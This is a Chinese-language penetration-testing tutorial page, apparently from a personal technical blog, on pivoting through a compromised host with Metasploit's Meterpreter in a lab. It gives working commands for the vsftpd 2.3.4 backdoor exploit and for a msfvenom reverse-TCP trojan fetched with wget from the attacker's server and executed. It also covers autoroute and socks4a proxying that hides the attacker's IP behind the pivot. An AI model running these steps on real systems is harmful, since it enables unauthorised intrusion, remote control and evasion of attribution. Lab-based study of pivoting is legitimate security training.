href="/md/hack/tools/2022-04-17-008-Kali2.0Meterpreter运用.html" class="sidebar-link">Kali2.0 Meterpreter 运用</a></li><li><a href="/md/hack/tools/2022-04-17-009-lcx.exe内网转发命令教程-LCX免杀下载.html" class="sidebar-link">lcx.exe内网转发命令教程-LCX免杀下载</a></li><li><a href="/md/hack/tools/2022-04-17-010-字典生成工具Crunch的使用案例.html" class="sidebar-link">字典生成工具Crunch的使用案例</a></li><li><a href="/md/hack/tools/2022-04-17-011-WinlogonHack获取系统密码.html" class="sidebar-link">WinlogonHack获取系统密码</a></li><li><a href="/md/hack/tools/2022-04-17-012-Msfvenom生成各类Payload命令.html" class="sidebar-link">Msfvenom生成各类Payload命令</a></li><li><a href="/md/hack/tools/2022-04-17-013-PsExec下载地址及其用法.html" class="sidebar-link">PsExec下载地址及其用法</a></li><li><a href="/md/hack/tools/2022-04-17-014-Hydra安装Libssh模块.html" class="sidebar-link">Hydra安装Libssh模块</a></li><li><a href="/md/hack/tools/2022-04-17-015-利用procdump+Mimikatz绕过杀软获取Windows明文密码.html" class="sidebar-link">利用procdump+Mimikatz 绕过杀软获取Windows明文密码</a></li><li><a href="/md/hack/tools/2022-04-17-016-SQLMap的用法+谷歌黑客语法.html" class="sidebar-link">SQLMap的用法+谷歌黑客语法</a></li><li><a href="/md/hack/tools/2022-04-17-017-SQLMap用法总结.html" class="sidebar-link">SQLMap用法总结</a></li><li><a href="/md/hack/tools/2022-04-17-018-SQLMap参数说明.html" class="sidebar-link">SQLMap参数说明</a></li><li><a href="/md/hack/tools/2022-04-17-019-十大渗透测试演练系统.html" class="sidebar-link">十大渗透测试演练系统</a></li><li><a href="/md/hack/tools/2022-04-17-020-目录扫描神器DirBuster用法.html" class="sidebar-link">目录扫描神器DirBuster用法</a></li><li><a href="/md/hack/tools/2022-04-17-021-NMap在实战中的常见用法.html" class="sidebar-link">NMap在实战中的常见用法</a></li><li><a href="/md/hack/tools/2022-04-17-022-Metasploit模块的格式说明.html" class="sidebar-link">Metasploit模块的格式说明</a></li><li><a href="/md/hack/tools/2022-04-17-023-Meterpreter命令大全.html" class="sidebar-link">Meterpreter命令大全</a></li><li><a href="/md/hack/tools/2022-04-17-024-Metasploit-Meterpreter-Shell信息收集相关的命令.html" class="sidebar-link">Metasploit-Meterpreter-Shell信息收集相关的命令</a></li><li><a href="/md/hack/tools/2022-04-17-025-使用Metasploit编写绕过DEP渗透模块.html" class="sidebar-link">使用Metasploit编写绕过DEP渗透模块</a></li><li><a href="/md/hack/tools/2022-04-17-026-Metasploit渗透php-utility-belt程序.html" class="sidebar-link">Metasploit渗透php-utility-belt程序</a></li><li><a href="/md/hack/tools/2022-04-17-027-内网IPC$入侵.html" class="sidebar-link">内网IPC$入侵</a></li><li><a href="/md/hack/tools/2022-04-17-028-Metasploit渗透BSPlayerV2.68.html" class="sidebar-link">Metasploit渗透BSPlayer V2.68</a></li><li><a href="/md/hack/tools/2022-04-17-029-Metasploit攻击VSFTPD2.3.4后门漏洞并渗透内网.html" class="sidebar-link">Metasploit攻击VSFTPD2.3.4后门漏洞并渗透内网</a></li><li><a href="/md/hack/tools/2022-04-17-030-Metasploit攻击PHP-CGI查询字符串参数漏洞并渗透内网.html" class="sidebar-link">Metasploit攻击PHP-CGI查询字符串参数漏洞并渗透内网</a></li><li><a href="/md/hack/tools/2022-04-17-031-Metasploit攻击HFS2.3上的漏洞.html" class="sidebar-link">Metasploit攻击HFS2.3上的漏洞</a></li><li><a href="/md/hack/tools/2022-04-17-032-Metasploit访问控制的持久化.html" class="sidebar-link">Metasploit访问控制的持久化</a></li><li><a href="/md/hack/tools/2022-04-17-033-Metasploit清除渗透痕迹.html" class="sidebar-link">Metasploit清除渗透痕迹</a></li><li><a href="/md/hack/tools/2022-04-17-034-利用Metasploit找出SCADA服务器.html" class="sidebar-link">利用Metasploit找出SCADA服务器</a></li><li><a href="/md/hack/tools/2022-04-17-035-利用Metasploit渗透DATAC-RealWin-SCADA Server2.0.html" class="sidebar-link">利用Metasploit渗透DATAC-RealWin-SCADA Server2.0</a></li><li><a href="/md/hack/tools/2022-04-17-036-MSF-Meterpreter清理日志.html" class="sidebar-link">MSF-Meterpreter清理日志</a></li><li><a href="/md/hack/tools/2022-04-17-037-Metasploit自定义FTP扫描模块.html" class="sidebar-link">Metasploit自定义FTP扫描模块</a></li><li><a href="/md/hack/tools/2022-04-17-038-Metasploit渗透MSSQL.html" class="sidebar-link">Metasploit渗透MSSQL</a></li><li><a href="/md/hack/tools/2022-04-17-039-Metasploit渗透VOIP.html" class="sidebar-link">Metasploit渗透VOIP</a></li><li><a href="/md/hack/tools/2022-04-17-040-破解工具hydra安装与使用.html" class="sidebar-link">破解工具hydra安装与使用</a></li><li><a href="/md/hack/tools/2022-04-17-041-Metasploit自定义SSH认证暴力破解器.html" class="sidebar-link">Metasploit自定义SSH认证暴力破解器</a></li><li><a href="/md/hack/tools/2022-04-17-042-Metasploit自定义让磁盘失效的后渗透模块.html" class="sidebar-link">Metasploit自定义让磁盘失效的后渗透模块</a></li><li><a href="/md/hack/tools/2022-04-17-043-PowerShell基本命令和绕过权限执行.html" class="sidebar-link">PowerShell基本命令和绕过权限执行</a></li><li><a href="/md/hack/tools/2022-05-02-001-Metasploit自定义收集登录凭证的后渗透模块.html" class="sidebar-link">Metasploit自定义收集登录凭证的后渗透模块</a></li><li><a href="/md/hack/tools/2022-05-02-002-利用Java生成穷举字典(数字+字母(大小写)+字符).html" class="sidebar-link">利用Java生成穷举字典(数字+字母(大小写)+字符)</a></li><li><a href="/md/hack/tools/2022-05-02-003-PowerShell工具之Powerup详解实录.html" class="sidebar-link">PowerShell工具之Powerup详解实录</a></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter以被控制的计算机为跳板渗透其他服务器.html" class="active sidebar-link">Meterpreter以被控制的计算机为跳板渗透其他服务器</a></li><li><a href="/md/hack/tools/2022-05-02-005-Win10完美去除桌面快捷图标小箭头.html" class="sidebar-link">Win10完美去除桌面快捷图标小箭头</a></li><li><a href="/md/hack/tools/2022-05-02-006-OpenVAS8.0-Vulnerability-Scanning.html" class="sidebar-link">OpenVAS 8.0 Vulnerability Scanning</a></li><li><a href="/md/hack/tools/2022-05-02-007-kali-Metasploit连接Postgresql默认密码.html" class="sidebar-link">kali Metasploit 连接 Postgresql 默认密码</a></li><li><a href="/md/hack/tools/2022-05-02-008-使用OpenVAS进行漏洞扫描.html" class="sidebar-link">kali 使用OpenVAS进行漏洞扫描</a></li><li><a href="/md/hack/tools/2022-05-02-009-对威胁建模附加搭建CVE2014-6287漏洞环境.html" class="sidebar-link">kali 对威胁建模(附加搭建CVE:2014-6287漏洞环境)</a></li><li><a href="/md/hack/tools/2022-05-02-010-Metasploit设置永久访问权限.html" class="sidebar-link">kali Metasploit设置永久访问权限</a></li><li><a href="/md/hack/tools/2022-05-02-011-Empire反弹回Metasploit.html" class="sidebar-link">Empire 反弹回 Metasploit</a></li><li><a href="/md/hack/tools/2022-05-02-012-Metasploit制作并运行自定义Meterpreper脚本.html" class="sidebar-link">Metasploit制作并运行自定义Meterpreper脚本</a></li><li><a href="/md/hack/tools/2022-05-02-013-使用Metasploit实现对缓冲区栈的溢出攻击.html" class="sidebar-link">使用Metasploit实现对缓冲区栈的溢出攻击</a></li><li><a href="/md/hack/tools/2022-05-02-014-使用Metasploit实现基于SEH的缓冲区溢出攻击.html" class="sidebar-link">使用Metasploit实现基于SEH的缓冲区溢出攻击</a></li><li><a href="/md/hack/tools/2022-05-02-015-Metasploit基本后渗透命令.html" class="sidebar-link">Metasploit基本后渗透命令</a></li><li><a href="/md/hack/tools/2022-05-02-016-Metasploit高级后渗透模块.html" class="sidebar-link">Metasploit高级后渗透模块</a></li><li><a href="/md/hack/tools/2022-05-02-017-Kali中一键更新Metasploit框架.html" class="sidebar-link">Kali中一键更新Metasploit框架</a></li><li><a href="/md/hack/tools/2022-05-02-018-Metasploit其他后渗透模块.html" class="sidebar-link">Metasploit其他后渗透模块</a></li><li><a href="/md/hack/tools/2022-05-02-019-Metasploit高级扩展功能.html" class="sidebar-link">Metasploit高级扩展功能</a></li><li><a href="/md/hack/tools/2022-05-02-020-Metasploit之pushm和popm命令.html" class="sidebar-link">Metasploit之pushm和popm命令</a></li><li><a href="/md/hack/tools/2022-05-02-021-Metasploit使用reload-edit-reload_all命令加快开发过程.html" class="sidebar-link">Metasploit使用reload、edit、reload_all命令加快开发过程</a></li><li><a href="/md/hack/tools/2022-05-02-022-Metasploit资源脚本的使用方法.html" class="sidebar-link">Metasploit资源脚本的使用方法</a></li><li><a href="/md/hack/tools/2022-05-02-023-在Metasploit中使用AutoRunScript.html" class="sidebar-link">在Metasploit中使用AutoRunScript</a></li><li><a href="/md/hack/tools/2022-05-02-024-使用Metasploit获取目标的控制权限.html" class="sidebar-link">使用Metasploit获取目标的控制权限</a></li><li><a href="/md/hack/tools/2022-05-02-025-使用Metasploit中的NMap插件扫描并渗透内网主机.html" class="sidebar-link">使用Metasploit中的NMap插件扫描并渗透内网主机</a></li><li><a href="/md/hack/tools/2022-05-02-026-Kali一句话升级Metasploit的命令.html" class="sidebar-link">Kali一句话升级Metasploit的命令</a></li><li><a href="/md/hack/tools/2022-05-02-027-Win2012R2打Windows8.1-KB2919355.html" class="sidebar-link">Win2012R2打Windows8.1-KB2919355</a></li><li><a href="/md/hack/tools/2022-05-02-028-Armitage基本原理.html" class="sidebar-link">Armitage基本原理</a></li><li><a href="/md/hack/tools/2022-05-02-029-Armitage网络扫描以及主机管理.html" class="sidebar-link">Armitage网络扫描以及主机管理</a></li><li><a href="/md/hack/tools/2022-05-02-030-使用Armitage进行渗透.html" class="sidebar-link">使用Armitage进行渗透</a></li><li><a href="/md/hack/tools/2022-05-02-031-使用Armitage进行后渗透攻击.html" class="sidebar-link">使用Armitage进行后渗透攻击</a></li><li><a href="/md/hack/tools/2022-05-02-032-使用Armitage进行客户端攻击.html" class="sidebar-link">使用Armitage进行客户端攻击</a></li><li><a href="/md/hack/tools/2022-05-02-033-Armitage脚本编写.html" class="sidebar-link">Armitage脚本编写</a></li><li><a href="/md/hack/tools/2022-05-02-034-Armitage控制Metasploit.html" class="sidebar-link">Armitage控制Metasploit</a></li><li><a href="/md/hack/tools/2022-05-02-035-Armitage使用Cortana实现后渗透攻击.html" class="sidebar-link">Armitage使用Cortana实现后渗透攻击</a></li><li><a href="/md/hack/tools/2022-05-02-036-Armitage使用Cortana创建自定义菜单.html" class="sidebar-link">Armitage使用Cortana创建自定义菜单</a></li><li><a href="/md/hack/tools/2022-05-02-037-Armitage界面的使用.html" class="sidebar-link">Armitage界面的使用</a></li><li><a href="/md/hack/tools/2022-05-02-038-tcpdump用法说明.html" class="sidebar-link">tcpdump用法说明</a></li></ul></section></li></ul> </aside> <div><main class="page"> <div class="theme-default-content content__default"><h1 id="meterpreter以被控制的计算机为跳板渗透其他服务器"><a href="#meterpreter以被控制的计算机为跳板渗透其他服务器" class="header-anchor">#</a> Meterpreter以被控制的计算机为跳板渗透其他服务器</h1> <p>攻击机：Kali 192.168.75.10</p> <p>跳板： Metasploitable2 192.168.75.130</p> <p>目标机： Windows Server 2012 192.168.75.140</p> <p>这里无法通过Kali(192.168.75.10)主机直接访问目标机(192.168.75.140)，目标机只能通过跳板(192.168.75.130)访问，这里Kali(192.168.75.10)已经成功渗透跳板(192.168.75.130)主机，需要将已渗透主机(192.168.75.130)设置为跳板来访问目标机(192.168.75.140)。</p> <p>如果直接通过攻击机(192.168.75.10)访问目标机(192.168.75.140),会出现如下错误：</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190114124851544.png" loading="lazy" class="lazy"></p> <p>这里，跳板(192.168.75.130)拥有连接目标机(192.168.75.140)权限。因此需要一些方法将我们对目标机(192.168.75.140)发起的请求通过跳板(192.168.75.130)转发出去，需要的这种技术方法就是跳板技术。</p> <p>这里，我们首先要渗透跳板(192.168.75.130)主机。具体步骤如下：</p> <p>开启MSF</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>msfconsole
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h2 id="扫描指定主机的服务和端口"><a href="#扫描指定主机的服务和端口" class="header-anchor">#</a> 扫描指定主机的服务和端口</h2> <div class="language- line-numbers-mode"><pre class="language-text"><code>nmap -sV -p 21,22,25,80,110,443,445 192.168.75.130
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>如果要存入MSF的数据库，则：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>db_nmap -sV -p 21,22,25,80,110,443,445 192.168.75.130
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h2 id="列出在目标端口上运行的服务"><a href="#列出在目标端口上运行的服务" class="header-anchor">#</a> 列出在目标端口上运行的服务</h2> <div class="language- line-numbers-mode"><pre class="language-text"><code>services
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h2 id="过滤服务-只显示开启的服务"><a href="#过滤服务-只显示开启的服务" class="header-anchor">#</a> 过滤服务，只显示开启的服务</h2> <div class="language- line-numbers-mode"><pre class="language-text"><code>services -u
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h2 id="列出数据库中所有的主机"><a href="#列出数据库中所有的主机" class="header-anchor">#</a> 列出数据库中所有的主机</h2> <div class="language- line-numbers-mode"><pre class="language-text"><code>hosts
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h2 id="漏洞攻击"><a href="#漏洞攻击" class="header-anchor">#</a> 漏洞攻击</h2> <div class="language- line-numbers-mode"><pre class="language-text"><code>use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOST 192.168.75.130
set RPORT 21
show payloads
set payload cmd/unix/interact
exploit
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><p>注：所有操作都是在MSF终端下</p> <p><strong>这里，我们继续将Shell控制升级为Meterpreter命令行。</strong></p> <p>在攻击机Kali上重新开启一个终端：</p> <h2 id="生成反弹木马"><a href="#生成反弹木马" class="header-anchor">#</a> 生成反弹木马</h2> <div class="language- line-numbers-mode"><pre class="language-text"><code>msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST 192.168.75.10 LPORT 4444 -f elf &gt; backdoor.elf
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>注：elf是Linux系统下的默认扩展名</p> <h2 id="启动kali上的apache服务-并将backdoor-elf放置到服务器中"><a href="#启动kali上的apache服务-并将backdoor-elf放置到服务器中" class="header-anchor">#</a> 启动Kali上的Apache服务，并将backdoor.elf放置到服务器中</h2> <div class="language- line-numbers-mode"><pre class="language-text"><code>service apache2 start
mv backdoor.elf /var/www/html/
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>这样，就可以让目标系统从我们的计算机中下载这个木马文件了。</p> <h2 id="在目标机上下载木马文件"><a href="#在目标机上下载木马文件" class="header-anchor">#</a> 在目标机上下载木马文件</h2> <p>切换到第6步的终端，执行命令：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>wget http://192.168.75.10/backdoor.elf
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>即将木马文件下载到了目标机上</p> <h2 id="在新开启的终端上执行如下命令"><a href="#在新开启的终端上执行如下命令" class="header-anchor">#</a> 在新开启的终端上执行如下命令</h2> <div class="language- line-numbers-mode"><pre class="language-text"><code>msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.75.10
set LPORT 4444
exploit
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><h2 id="在目标机上运行木马文件"><a href="#在目标机上运行木马文件" class="header-anchor">#</a> 在目标机上运行木马文件</h2> <p>切换到第6步的终端，执行命令：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>chmod 7777 backdoor.elf
./backdoor.elf
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><h2 id="查看反弹的meterpreter终端"><a href="#查看反弹的meterpreter终端" class="header-anchor">#</a> 查看反弹的Meterpreter终端</h2> <p>回到新开启的终端上查看，此时，我们看到已经反弹回Meterpreter命令行了。</p> <p>接下来，就可以在Meterpreter终端进行操作了。</p> <p>下面，我们需要执行autoroute脚本，并使用-s将脚本的参数设定为目标主机(192.168.75.140)的IP地址，这样我们就可以在已经被我们渗透的跳板机(192.168.75.130)上添加一条到达目标主机(192.168.75.140)的路由。</p> <h2 id="添加路由"><a href="#添加路由" class="header-anchor">#</a> 添加路由</h2> <div class="language- line-numbers-mode"><pre class="language-text"><code>run autoroute -p
run autoroute -s 192.168.75.140
run autoroute -p
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>以攻击者(192.168.75.10)的角度看，现在需要启动一个可以将请求通过Meterpreter发送给目标的模块。可以选择auxiliary/server/socks4a这个模块。</p> <h2 id="启动监听"><a href="#启动监听" class="header-anchor">#</a> 启动监听</h2> <p>在攻击机(192.168.75.10)上执行如下命令：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>use auxiliary/server/socks4a
show options
set SRVHOST 127.0.0.1
set SRVPORT 1080
run
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><h2 id="配置攻击机-192-168-75-10-etc-proxychains-conf"><a href="#配置攻击机-192-168-75-10-etc-proxychains-conf" class="header-anchor">#</a> 配置攻击机(192.168.75.10)/etc/proxychains.conf</h2> <p>添加下面一行配置：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>socks4 127.0.0.1 1080
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190114125602716.png" loading="lazy" class="lazy"></p> <h2 id="配置forefox代理"><a href="#配置forefox代理" class="header-anchor">#</a> 配置Forefox代理</h2> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190114125618848.png" loading="lazy" class="lazy"></p> <p>再一次打开目标服务器(192.168.75.140)的限制目录下的网页。</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190114125638407.png" loading="lazy" class="lazy"></p> <p>这里，我们就可以访问了。</p> <p>接下来，我们访问下目标服务器(192.168.75.140)服务器的IP记录器，如下：</p> <p><img alt="img" data-src="https://img-blog.csdnimg.cn/20190114125656890.png" loading="lazy" class="lazy"></p> <p>可以看到是跳板(192.168.75.130)的IP地址，不管我们对目标服务器(192.168.75.140)做了什么，对目标服务器(192.168.75.140)眼中这一切都是跳板机(192.168.75.130)做的。然而，我们的真实IP确是192.168.75.10。</p> <h1 id="写在最后"><a href="#写在最后" class="header-anchor">#</a> 写在最后</h1> <blockquote><p>如果你觉得冰河写的还不错，请微信搜索并关注「 <strong>冰河技术</strong> 」微信公众号，跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术，「 <strong>冰河技术</strong> 」微信公众号更新了大量技术专题，每一篇技术文章干货满满！不少读者已经通过阅读「 <strong>冰河技术</strong> 」微信公众号文章，吊打面试官，成功跳槽到大厂；也有不少读者实现了技术上的飞跃，成为公司的技术骨干！如果你也想像他们一样提升自己的能力，实现技术能力的飞跃，进大厂，升职加薪，那就关注「 <strong>冰河技术</strong> 」微信公众号吧，每天更新超硬核技术干货，让你对如何提升技术能力不再迷茫！</p></blockquote> <p><img alt="" data-src="https://img-blog.csdnimg.cn/20200906013715889.png" loading="lazy" class="lazy"></p></div> <footer class="page-edit"><div class="edit-link"><a href="https://github.com/binghe001/BingheGuide/edit/master/docs/md/hack/tools/2022-05-02-004-Meterpreter以被控制的计算机为跳板渗透其他服务器.md" target="_blank" rel="noopener noreferrer">在 GitHub 上编辑此页</a> <span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></div> <div class="last-updated"><span class="prefix">上次更新: </span> <span class="time">2022/5/23</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev">
        ←
        <a href="/md/hack/tools/2022-05-02-003-PowerShell工具之Powerup详解实录.html" class="prev">
          PowerShell工具之Powerup详解实录
        </a></span> <span class="next"><a href="/md/hack/tools/2022-05-02-005-Win10完美去除桌面快捷图标小箭头.html">
          Win10完美去除桌面快捷图标小箭头
        </a>
        →
      </span></p></div> </main></div> <aside class="page-sidebar"> <div class="page-side-toolbar"><div class="option-box-toc-fixed"><div class="toc-container-sidebar"><div class="pos-box"><div class="icon-arrow"></div> <div class="scroll-box" style="max-height:650px"><div style="font-weight:bold;text-align:center;">Meterpreter以被控制的计算机为跳板渗透其他服务器</div> <hr> <div class="toc-box"><ul class="toc-sidebar-links"><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#扫描指定主机的服务和端口" class="toc-sidebar-link">扫描指定主机的服务和端口</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#列出在目标端口上运行的服务" class="toc-sidebar-link">列出在目标端口上运行的服务</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#过滤服务-只显示开启的服务" class="toc-sidebar-link">过滤服务，只显示开启的服务</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#列出数据库中所有的主机" class="toc-sidebar-link">列出数据库中所有的主机</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#漏洞攻击" class="toc-sidebar-link">漏洞攻击</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#生成反弹木马" class="toc-sidebar-link">生成反弹木马</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#启动kali上的apache服务-并将backdoor-elf放置到服务器中" class="toc-sidebar-link">启动Kali上的Apache服务，并将backdoor.elf放置到服务器中</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#在目标机上下载木马文件" class="toc-sidebar-link">在目标机上下载木马文件</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#在新开启的终端上执行如下命令" class="toc-sidebar-link">在新开启的终端上执行如下命令</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#在目标机上运行木马文件" class="toc-sidebar-link">在目标机上运行木马文件</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#查看反弹的meterpreter终端" class="toc-sidebar-link">查看反弹的Meterpreter终端</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#添加路由" class="toc-sidebar-link">添加路由</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#启动监听" class="toc-sidebar-link">启动监听</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#配置攻击机-192-168-75-10-etc-proxychains-conf" class="toc-sidebar-link">配置攻击机(192.168.75.10)/etc/proxychains.conf</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#配置forefox代理" class="toc-sidebar-link">配置Forefox代理</a><ul class="toc-sidebar-sub-headers"></ul></li></ul></div></div></div></div></div> <div class="option-box-toc-over"><img src="/images/system/toc.png" class="nozoom"> <span class="show-txt">目录</span> <div class="toc-container"><div class="pos-box"><div class="icon-arrow"></div> <div class="scroll-box" style="max-height:550px"><div style="font-weight:bold;text-align:center;">Meterpreter以被控制的计算机为跳板渗透其他服务器</div> <hr> <div class="toc-box"><ul class="toc-sidebar-links"><li><a 